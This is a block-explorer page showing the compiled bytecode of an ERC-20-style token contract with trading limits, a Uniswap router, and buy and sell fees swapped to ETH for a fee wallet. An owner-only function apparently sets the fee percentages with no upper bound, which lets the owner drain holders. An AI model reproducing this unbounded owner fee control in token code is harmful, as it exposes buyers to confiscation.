5460ff1680610cb857506001600160a01b0383165f9081526002602052604090205460ff165b80610cea5750600a546001600160a01b03858116911614801590610cea5750600a546001600160a01b03848116911614155b15610dc0576001600160a01b0384165f9081526020819052604090205482811015610d275760405162461bcd60e51b8152600401610452906113a1565b610d31838261133c565b6001600160a01b038087165f908152602081905260408082209390935590861681529081208054859290610d6690849061134f565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610db291815260200190565b60405180910390a350610fb9565b600a546001600160a01b038581169116148015610df057506009546001600160a01b038481166101009092041614155b15610e1257606460075483610e0591906113e7565b610e0f91906113fe565b90505b600a546001600160a01b038481169116148015610e4257506009546001600160a01b038581166101009092041614155b15610e6457606460085483610e5791906113e7565b610e6191906113fe565b90505b6001600160a01b0384165f9081526020819052604090205482811015610e9c5760405162461bcd60e51b8152600401610452906113a1565b610ea6838261133c565b6001600160a01b0386165f90815260208190526040902055610ec8828461133c565b6001600160a01b0385165f9081526020819052604081208054909190610eef90849061134f565b90915550506001600160a01b038085169086167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610f2d858761133c565b60405190815260200160405180910390a38115610fb757305f9081526020819052604081208054849290610f6290849061134f565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fae91815260200190565b60405180910390a35b505b50505050565b600e805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106110055761100561141d565b60200260200101906001600160a01b031690816001600160a01b031681525050600960019054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611076573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061109a9190611386565b816001815181106110ad576110ad61141d565b6001600160a01b0392831660209182029290920101526009546110d891309161010090041684610803565b60095460405163791ac94760e01b81526101009091046001600160a01b03169063791ac947906111149085905f90869030904290600401611431565b5f604051808303815f87803b15801561112b575f80fd5b505af115801561113d573d5f803e3d5ffd5b5050600e805460ff60a01b1916905550505050565b600e546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015611189573d5f803e3d5ffd5b5050565b5f602080835283518060208501525f5b818110156111b95785810183015185820160400152820161119d565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146111ed575f80fd5b50565b5f8060408385031215611201575f80fd5b823561120c816111d9565b946020939093013593505050565b5f805f6060848603121561122c575f80fd5b8335611237816111d9565b92506020840135611247816111d9565b929592945050506040919091013590565b5f60208284031215611268575f80fd5b8135611273816111d9565b9392505050565b5f806040838503121561128b575f80fd5b50508035926020909101359150565b5f602082840312156112aa575f80fd5b81358015158114611273575f80fd5b5f80604083850312156112ca575f80fd5b82356112d5816111d9565b915060208301356112e5816111d9565b809150509250929050565b600181811c9082168061130457607f821691505b60208210810361132257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b818103818111156103c0576103c0611328565b808201808211156103c0576103c0611328565b6020808252600a90820152694e6f74206f776e65722160b01b604082015260600190565b5f60208284031215611396575f80fd5b8151611273816111d9565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b80820281158282048414176103c0576103c0611328565b5f8261141857634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156114815784516001600160a01b03168352938301939183019160010161145c565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220186fe7cf75b8e93d8f92b20fd683e7470ef73c36991bfa6852f8345cda0c519c64736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610132575f3560e01c806370a08231116100b45780638f9a55c0116100795780638f9a55c0146102a957806395d89b41146102b2578063a457c2d7146102ba578063a9059cbb146102cd578063d5e1cbff146102e0578063dd62ed3e146102e8575f80fd5b806370a082311461023f578063788454a5146102675780637d1db4a51461027c5780638da5cb5b146102855780638e26bbe414610296575f80fd5b806323b872dd116100fa57806323b872dd146101cc5780632fd689e3146101df578063313ce567146101e8578063395093511461021957806349bd5a5e1461022c575f80fd5b806306fdde0314610136578063095ea7b3146101545780631694505e1461017757806318160ddd146101a75780631ffdf9fa146101b9575b5f80fd5b61013e610320565b60405161014b919061118d565b60405180910390f35b6101676101623660046111f0565b6103b0565b604051901515815260200161014b565b60095461018f9061010090046001600160a01b031681565b6040516001600160a01b03909116815260200161014b565b6003545b60405190815260200161014b565b600e5461018f906001600160a01b031681565b6101676101da36600461121a565b6103c6565b6101ab600d5481565b60405160ff7f000000000000000000000000000000000000000000000000000000000000001216815260200161014b565b6101676102273660046111f0565b61047a565b600a5461018f906001600160a01b031681565b6101ab61024d366004611258565b6001600160a01b03165f9081526020819052604090205490565b61027a61027536600461127a565b6104b0565b005b6101ab600b5481565b6006546001600160a01b031661018f565b61027a6102a436600461129a565b6104e5565b6101ab600c5481565b61013e610710565b6101676102c83660046111f0565b61071f565b6101676102db3660046111f0565b6107b9565b61027a6107c5565b6101ab6102f63660046112b9565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606004805461032f906112f0565b80601f016020809104026020016040519081016040528092919081815260200182805461035b906112f0565b80156103a65780601f1061037d576101008083540402835291602001916103a6565b820191905f5260205f20905b81548152906001019060200180831161038957829003601f168201915b5050505050905090565b5f6103bc338484610803565b5060015b92915050565b5f6103d2848484610926565b6001600160a01b0384165f9081526001602090815260408083203384529091529020548281101561045b5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61046f853361046a868561133c565b610803565b506001949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916103bc91859061046a90869061134f565b6006546001600160a01b031633146104da5760405162461bcd60e51b815260040161045290611362565b600791909155600855565b6006546001600160a01b0316331461050f5760405162461bcd60e51b815260040161045290611362565b60095460ff16156105625760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f74207265656e61626c652074726164696e670000000000000000006044820152606401610452565b60098054610100600160a81b031916747a250d5630b4cf539739df2c5dacb4c659f2488d001790556040805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d91829163c45a0155916004808201926020929091908290030181865afa1580156105db573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105ff9190611386565b6001600160a01b031663e6a4390530836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561064a573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061066e9190611386565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156106b8573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106dc9190611386565b600a80546001600160a01b0319166001600160a01b0392909216919091179055506009805460ff1916911515919091179055565b60606005805461032f906112f0565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156107a05760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610452565b6107af338561046a868561133c565b5060019392505050565b5f6103bc338484610926565b6006546001600160a01b031633146107ef5760405162461bcd60e51b815260040161045290611362565b600354600b55600354600c55600354600d55565b6001600160a01b0383166108655760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610452565b6001600160a01b0382166108c65760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610452565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661098a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610452565b6001600160a01b0382166109ec5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610452565b6006546001600160a01b03848116911614801590610a1857506006546001600160a01b03838116911614155b15610c7b5760095460ff16610aaa576006546001600160a01b03848116911614610aaa5760405162461bcd60e51b815260206004820152603f60248201527f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e642060448201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c6564006064820152608401610452565b600b54811115610afc5760405162461bcd60e51b815260206004820152601c60248201527f544f4b454e3a204d6178205472616e73616374696f6e204c696d6974000000006044820152606401610452565b600a546001600160a01b03838116911614610b9657600c5481610b33846001600160a01b03165f9081526020819052604090205490565b610b3d919061134f565b10610b965760405162461bcd60e51b815260206004820152602360248201527f544f4b454e3a2042616c616e636520657863656564732077616c6c65742073696044820152627a652160e81b6064820152608401610452565b305f90815260208190526040902054600b548110610bb35750600b545b600d54600b5490821015908210610bca57600b5491505b808015610be15750600e54600160a01b900460ff16155b8015610bfb5750600a546001600160a01b03868116911614155b8015610c105750600e54600160a81b900460ff165b8015610c3457506001600160a01b0385165f9081526002602052604090205460ff16155b8015610c5857506001600160a01b0384165f9081526002602052604090205460ff16155b15610c7857610c6682610fbf565b478015610c7657610c7647611152565b505b50505b6001600160a01b0383165f9081526002602052604081205460ff1680610cb857506001600160a01b0383165f9081526002602052604090205460ff165b80610cea5750600a546001600160a01b03858116911614801590610cea5750600a546001600160a01b03848116911614155b15610dc0576001600160a01b0384165f9081526020819052604090205482811015610d275760405162461bcd60e51b8152600401610452906113a1565b610d31838261133c565b6001600160a01b038087165f908152602081905260408082209390935590861681529081208054859290610d6690849061134f565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610db291815260200190565b60405180910390a350610fb9565b600a546001600160a01b038581169116148015610df057506009546001600160a01b038481166101009092041614155b15610e1257606460075483610e0591906113e7565b610e0f91906113fe565b90505b600a546001600160a01b038481169116148015610e4257506009546001600160a01b038581166101009092041614155b15610e6457606460085483610e5791906113e7565b610e6191906113fe565b90505b6001600160a01b0384165f9081526020819052604090205482811015610e9c5760405162461bcd60e51b8152600401610452906113a1565b610ea6838261133c565b6001600160a01b0386165f90815260208190526040902055610ec8828461133c565b6001600160a01b0385165f9081526020819052604081208054909190610eef90849061134f565b90915550506001600160a01b038085169086167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610f2d858761133c565b60405190815260200160405180910390a38115610fb757305f9081526020819052604081208054849290610f6290849061134f565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fae91815260200190565b60405180910390a35b505b50505050565b600e805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106110055761100561141d565b60200260200101906001600160a01b031690816001600160a01b031681525050600960019054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611076573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061109a9190611386565b816001815181106110ad576110ad61141d565b6001600160a01b0392831660209182029290920101526009546110d891309161010090041684610803565b60095460405163791ac94760e01b81526101009091046001600160a01b03169063791ac947906111149085905f90869030904290600401611431565b5f604051808303815f87803b15801561112b575f80fd5b505af115801561113d573d5f803e3d5ffd5b5050600e805460ff60a01b1916905550505050565b600e546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015611189573d5f803e3d5ffd5b5050565b5f602080835283518060208501525f5b818110156111b95785810183015185820160400152820161119d565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146111ed575f80fd5b50565b5f8060408385031215611201575f80fd5b823561120c816111d9565b946020939093013593505050565b5f805f6060848603121561122c575f80fd5b8335611237816111d9565b92506020840135611247816111d9565b929592945050506040919091013590565b5f60208284031215611268575f80fd5b8135611273816111d9565b9392505050565b5f806040838503121561128b575f80fd5b50508035926020909101359150565b5f602082840312156112aa575f80fd5b81358015158114611273575f80fd5b5f80604083850312156112ca575f80fd5b82356112d5816111d9565b915060208301356112e5816111d9565b809150509250929050565b600181811c9082168061130457607f821691505b60208210810361132257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b818103818111156103c0576103c0611328565b808201808211156103c0576103c0611328565b6020808252600a90820152694e6f74206f776e65722160b01b604082015260600190565b5f60208284031215611396575f80fd5b8151611273816111d9565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b80820281158282048414176103c0576103c0611328565b5f8261141857634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156114815784516001600160a01b03168352938301939183019160010161145c565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220186fe7cf75b8e93d8f92b20fd683e7470ef73c36991bfa6852f8345cda0c519c64736f6c63430008180033

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.